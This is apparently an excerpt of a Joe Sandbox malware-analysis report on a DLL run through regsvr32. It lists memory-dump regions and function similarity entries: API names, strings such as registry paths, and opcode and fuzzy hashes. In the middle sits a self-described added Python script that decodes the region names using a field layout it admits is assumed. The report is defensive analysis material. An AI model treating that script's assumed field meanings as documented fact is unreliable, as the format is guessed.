                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3106088686-0
                                                                                                                                                                                    • Opcode ID: d48366c53854f49b5300689aa5fef707030d8cb3908e49b58aacd46522e5a323
                                                                                                                                                                                    • Instruction ID: 88143b9947d995fd135afd6007bdf7e006f29d4c93c5755c8297014baae904ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: d48366c53854f49b5300689aa5fef707030d8cb3908e49b58aacd46522e5a323
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E012C35206B4986EBC7AB65A4853E963A1AB4CBE1F19C224B925463D1EF3CC74C8310
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1315500227-0
                                                                                                                                                                                    • Opcode ID: 90e17716f0abe8ade5e61042a129ede90a5ec6d8601d3546d10bb0d774a64d29
                                                                                                                                                                                    • Instruction ID: 3f72a0a5fd1a10b8851e0b294ca67786da271e34aa2ccdda793f3f55451a433b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 90e17716f0abe8ade5e61042a129ede90a5ec6d8601d3546d10bb0d774a64d29
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B016235214B0D82EB968B15E8043EB53A5F78DBC6F98C530ED5A867A8DF3CC64D8740
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEnumOpenQueryValue
                                                                                                                                                                                    • String ID: Software\
                                                                                                                                                                                    • API String ID: 3984146545-964853688
                                                                                                                                                                                    • Opcode ID: 12bd0fc1200f519c0c9bd1d1f87c11f9a6b9b5ec8aa2a9f1296bf3a4ffe37874
                                                                                                                                                                                    • Instruction ID: fb556d810cef59515e6927380514bd390ba9bf4498066304b8987e3789019bc8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12bd0fc1200f519c0c9bd1d1f87c11f9a6b9b5ec8aa2a9f1296bf3a4ffe37874
                                                                                                                                                                                    • Instruction Fuzzy Hash: 63519672315E8982EB91DB25E4407DA63A1FB89BE4F448221FA69476D9DF78C648C700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: CloseDeleteEnumOpen
• String ID: Software\Classes\
• API String ID: 4142876296-1121929649
• Opcode ID: e03c1683f02b7bd1af60361353448972f516862f437fb5ae21698e9b4f9ee093
• Instruction ID: 40f783a4a5deab79eb5e9286dcc9650f64df3800fe8ed7aceb70ffdbda519f36
• Opcode Fuzzy Hash: e03c1683f02b7bd1af60361353448972f516862f437fb5ae21698e9b4f9ee093
• Instruction Fuzzy Hash: 7B415272615E4882EB919B29D48439A63A0FB8CBF4F508312FA6D437E5DF78C649C740
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID: @
• API String ID: 2178440468-2766056989
• Opcode ID: 83d5d067d9ed3c24426d95f86332b9de76371c07ce62199a27b7163ddd8c0bef
• Instruction ID: ef4282b44336dc17b9c21bbd474908c86e28ef90974653bfc591dfdae05196a0
• Opcode Fuzzy Hash: 83d5d067d9ed3c24426d95f86332b9de76371c07ce62199a27b7163ddd8c0bef
• Instruction Fuzzy Hash: 5C411D32201E4886EBA6DF65D5443ED37A0FB8CBD5F188125EB0947BA5DF39C6A8C341
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID:
• String ID: Edit
• API String ID: 0-554135844
• Opcode ID: 7e901d5db3268a1167f35996f1253c801ca61453d66c525f1a32a04eb0a09be1
• Instruction ID: ad190c3700badcd3eaa6ab0c33279c1c69684ad1269fe22038a605ac64dac38d
• Opcode Fuzzy Hash: 7e901d5db3268a1167f35996f1253c801ca61453d66c525f1a32a04eb0a09be1
• Instruction Fuzzy Hash: 85212E31201E0986FBE69B61E5557E92391B78CBC4F18D025FA15876D9DF28CA498341
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: free$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1012874770-0
• Opcode ID: b87b6e23f46ed097ced82e0a9d69a6d802008f7b66e4ed65d5f6623e8fbf2146
• Instruction ID: 8d435dccea0753d52150c9128cadf13fa0d24858d4c7be481841f1439a804799
• Opcode Fuzzy Hash: b87b6e23f46ed097ced82e0a9d69a6d802008f7b66e4ed65d5f6623e8fbf2146
• Instruction Fuzzy Hash: 8A01D772205D1892FAD3EB61D4923EA2365A78CBC8F559002F50E87592CF24DB8883A1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: _getptd
• String ID: MOC$csm
• API String ID: 3186804695-1389381023
• Opcode ID: 610fa95a075f196162efb4596cab28712756bce36c360406ab7c7507d520a257
• Instruction ID: 52a6fd04935734c33c081de4f9bd1901027a51008cb903e06116fae61730c0bf
• Opcode Fuzzy Hash: 610fa95a075f196162efb4596cab28712756bce36c360406ab7c7507d520a257
• Instruction Fuzzy Hash: C5E04F76944108C6EBA7BB6180073EC37A0F75CB86FC6D461B24442782CFBC878C8B12
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Global$CreateDestroyDialogIndirectLockParamUnlockWindow
• String ID:
• API String ID: 118996721-0
• Opcode ID: 64a4bef3045a19651f62699f8f7f6b06069dda067427d7ee80e2164b89d45d07
• Instruction ID: 8da9bb458c19a2d8981fc41d666f7e304be05cfa8d4ddef189530c8b9b7617a1
• Opcode Fuzzy Hash: 64a4bef3045a19651f62699f8f7f6b06069dda067427d7ee80e2164b89d45d07
• Instruction Fuzzy Hash: BC51B432205E9882DB96AF55E5803ED73A0FB89BD0F44C526FA5A437D5DF78C689C300
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: Pointer$Encode$Decode$Sleep_errnorealloc
• String ID:
• API String ID: 1310268301-0
• Opcode ID: e6c5d8ba728f0dcb7bf5a16147742b3cc7d3843224608a11f1ff0c1fb79c8644
• Instruction ID: fb2d31b84bdc592286becc738fcb00e1f14632bba21e92e7db94771b51ac62fb
• Opcode Fuzzy Hash: e6c5d8ba728f0dcb7bf5a16147742b3cc7d3843224608a11f1ff0c1fb79c8644
• Instruction Fuzzy Hash: A7215131302A4C40EBA3ABA1F5453EAA351B74C7C4F54D835F90E1B746DE78C649C380
Uniqueness
• Uniqueness Score: -1.00%
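
The "Memory Dump Source" lines in each entry above name the memory regions Joe Sandbox dumped from the regsvr32 process (process index 6) that hosts the analysed module at 0x180000000. The Python below is an added illustration, not part of the Joe Sandbox report or its tooling: it splits those region names into fields, decodes the protection and memory-type fields as the standard Win32 PAGE_* and MEM_* constants, and derives region sizes from the gaps between consecutive base addresses. The field layout it assumes (process index, dump phase, dump counter, base address, page protection, one uninterpreted field, memory type, module counter) is inferred from the values on this page and is not a documented format; the six region names are copied from the entries above.

```python
"""Decode Joe Sandbox ".sdmp" region names into a memory layout.

Added example, not Joe Sandbox code. ASSUMPTION: the dot-separated name is
  <proc index>.<dump phase>.<dump counter>.<base addr>.<page protection>.
  <uninterpreted>.<memory type>.<module counter>.sdmp
with <page protection> and <memory type> carrying the Win32
MEMORY_BASIC_INFORMATION values. The page's values fit that reading
(0x20 = PAGE_EXECUTE_READ on the code region, 0x02 = PAGE_READONLY on the
header/.rdata regions, 0x04 = PAGE_READWRITE on the data regions,
0x01000000 = MEM_IMAGE throughout), but it remains an assumption.
"""
from dataclasses import dataclass
from typing import List, Optional

# Standard Win32 constants (these values are documented by Microsoft).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Constructed sample: the six region names listed under "Memory Dump Source"
# for the regsvr32-hosted module on this page (first one keeps its suffix).
SAMPLE_REGIONS = [
    "00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true",
    "00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp",
    "00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp",
    "00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp",
    "00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp",
    "00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp",
]


@dataclass
class Region:
    proc_index: int
    base: int
    protect: int
    mem_type: int
    size: Optional[int] = None  # filled in from the next region's base

    @property
    def protect_name(self) -> str:
        # Mask off PAGE_GUARD / PAGE_NOCACHE modifier bits before lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

    @property
    def executable(self) -> bool:
        # PAGE_EXECUTE* protections all live in the 0x10..0x80 bits.
        return bool(self.protect & 0xF0)


def parse_region(entry: str) -> Region:
    """Parse one region line; trailing ', Offset: ...' text is ignored."""
    name = entry.split(",", 1)[0].strip()
    if not name.endswith(".sdmp"):
        raise ValueError(f"not an .sdmp name: {name!r}")
    fields = name[: -len(".sdmp")].split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 fields in {name!r}, got {len(fields)}")
    # Assumed field meanings; index/counters read as decimal, the rest as hex.
    return Region(
        proc_index=int(fields[0]),
        base=int(fields[3], 16),
        protect=int(fields[4], 16),
        mem_type=int(fields[6], 16),
    )


def build_layout(entries: List[str]) -> List[Region]:
    """Sort regions by base address and size each one up to its successor."""
    regions = sorted((parse_region(e) for e in entries), key=lambda r: r.base)
    for cur, nxt in zip(regions, regions[1:]):
        cur.size = nxt.base - cur.base
    return regions  # the last region's size stays None (no successor listed)


def executable_regions(regions: List[Region]) -> List[Region]:
    return [r for r in regions if r.executable]


def describe(regions: List[Region]) -> List[str]:
    lines = []
    for r in regions:
        size = f"{r.size:#x}" if r.size is not None else "?"
        lines.append(f"{r.base:#018x} size={size:>8} {r.protect_name:<22} {r.type_name}")
    return lines


if __name__ == "__main__":
    for line in describe(build_layout(SAMPLE_REGIONS)):
        print(line)
```

Run stand-alone it prints one line per region; on the sample the only executable region is the one at 0x180001000 (0x30000 bytes up to the read-only region at 0x180031000), which is the dump the function entries above cite as their Source File, with the module header region at 0x180000000 directly below it.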

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
Similarity
• API ID: _getptd$CallTranslator
• String ID: MOC
• API String ID: 3569367362-624257665
• Opcode ID: 6616c775d83a334c17e56d6f5e2deacf5da223c59004b66fb9269eb52e7d7877
• Instruction ID: 43cbe8c013764d56c593a2eb3bddf574111730e9c3a0797c382e77f9bba1149b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6616c775d83a334c17e56d6f5e2deacf5da223c59004b66fb9269eb52e7d7877
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A61BF73604AC885DBA2CB15E0803EDB3A1F789BC9F448516FB494BB99DF78C25AC700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$MessageSend$Text
                                                                                                                                                                                    • String ID: ...
                                                                                                                                                                                    • API String ID: 1325759018-440645147
                                                                                                                                                                                    • Opcode ID: 3f60d8f227ee4c4739953c51ea1781717f8ecb094c1c8ad408cf4acfc06b07ad
                                                                                                                                                                                    • Instruction ID: d4da3af2b34edc9fea6ca488a88eefcb891b5f7f437bcb17ce60630753295906
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f60d8f227ee4c4739953c51ea1781717f8ecb094c1c8ad408cf4acfc06b07ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 55418172714E4882EB86DB29D85079E7360FB85BF5F408311EA3983AE5DF69CA49C700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalSection$AddressEnterFreeInitializeLeaveLibraryProc
                                                                                                                                                                                    • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                                                                    • API String ID: 3379933665-63838506
                                                                                                                                                                                    • Opcode ID: 24ff9b3a42056d7f1fb5ebd3d4b665974d780c372db38e1e83173bec7e5a9e30
                                                                                                                                                                                    • Instruction ID: 3d2bce948b43eef7ee7bb53023e598d1ebf2c1fb6cc7cf138f49637fc99d2b8d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 24ff9b3a42056d7f1fb5ebd3d4b665974d780c372db38e1e83173bec7e5a9e30
                                                                                                                                                                                    • Instruction Fuzzy Hash: CA216A31211F4881EB96DB11E84039973A0F78DBC8F949525FA494B795EF78DA48C780
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: System$Metrics$InfoParameters
                                                                                                                                                                                    • String ID: DISPLAY
                                                                                                                                                                                    • API String ID: 3136151823-865373369
                                                                                                                                                                                    • Opcode ID: 3b642516bface9a6dcb8a5ec951136eb8bf72609a9aa77bd2d526a02dfbe0c01
                                                                                                                                                                                    • Instruction ID: 0170c18efbc9a9c9a335727720e9ce013c3621ff0ae234076072a75871cc08bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b642516bface9a6dcb8a5ec951136eb8bf72609a9aa77bd2d526a02dfbe0c01
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11B172600689C6EB96CF24D544BE9B3A1F78DBC9F18C021EA4546295DF38C65CC741
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassCompareLongNameStringWindow
                                                                                                                                                                                    • String ID: combobox
                                                                                                                                                                                    • API String ID: 1414938635-2240613097
                                                                                                                                                                                    • Opcode ID: 58d9aebcb3128cc2fcbb4ae3a9ec58b8c4b22273ac6f3c9d67935cce624ccf04
                                                                                                                                                                                    • Instruction ID: b3def97b1fa0067af54b2dec515cadf843c4037e2efbad05e44f130277f29aa9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58d9aebcb3128cc2fcbb4ae3a9ec58b8c4b22273ac6f3c9d67935cce624ccf04
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4601A133214F4482EB628B15F45139AB3A1F78D7D0F558211F69A47BA8DF3CC649CB40
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                    • String ID: ImageList_Duplicate
                                                                                                                                                                                    • API String ID: 310444273-3720651578
                                                                                                                                                                                    • Opcode ID: aa7021fa901f56359a90f058ac8fe50712b58c9e5c496761ea10096f55012edd
                                                                                                                                                                                    • Instruction ID: 148d71cfbafe6b0ed6a93e011731f4b7478dfd2da522bda92a8d62097d54fecd
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa7021fa901f56359a90f058ac8fe50712b58c9e5c496761ea10096f55012edd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9101FB32602B8985EF968F25E48439D73A4E75CFC8F18C025DA4C47364DF34C999C350
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
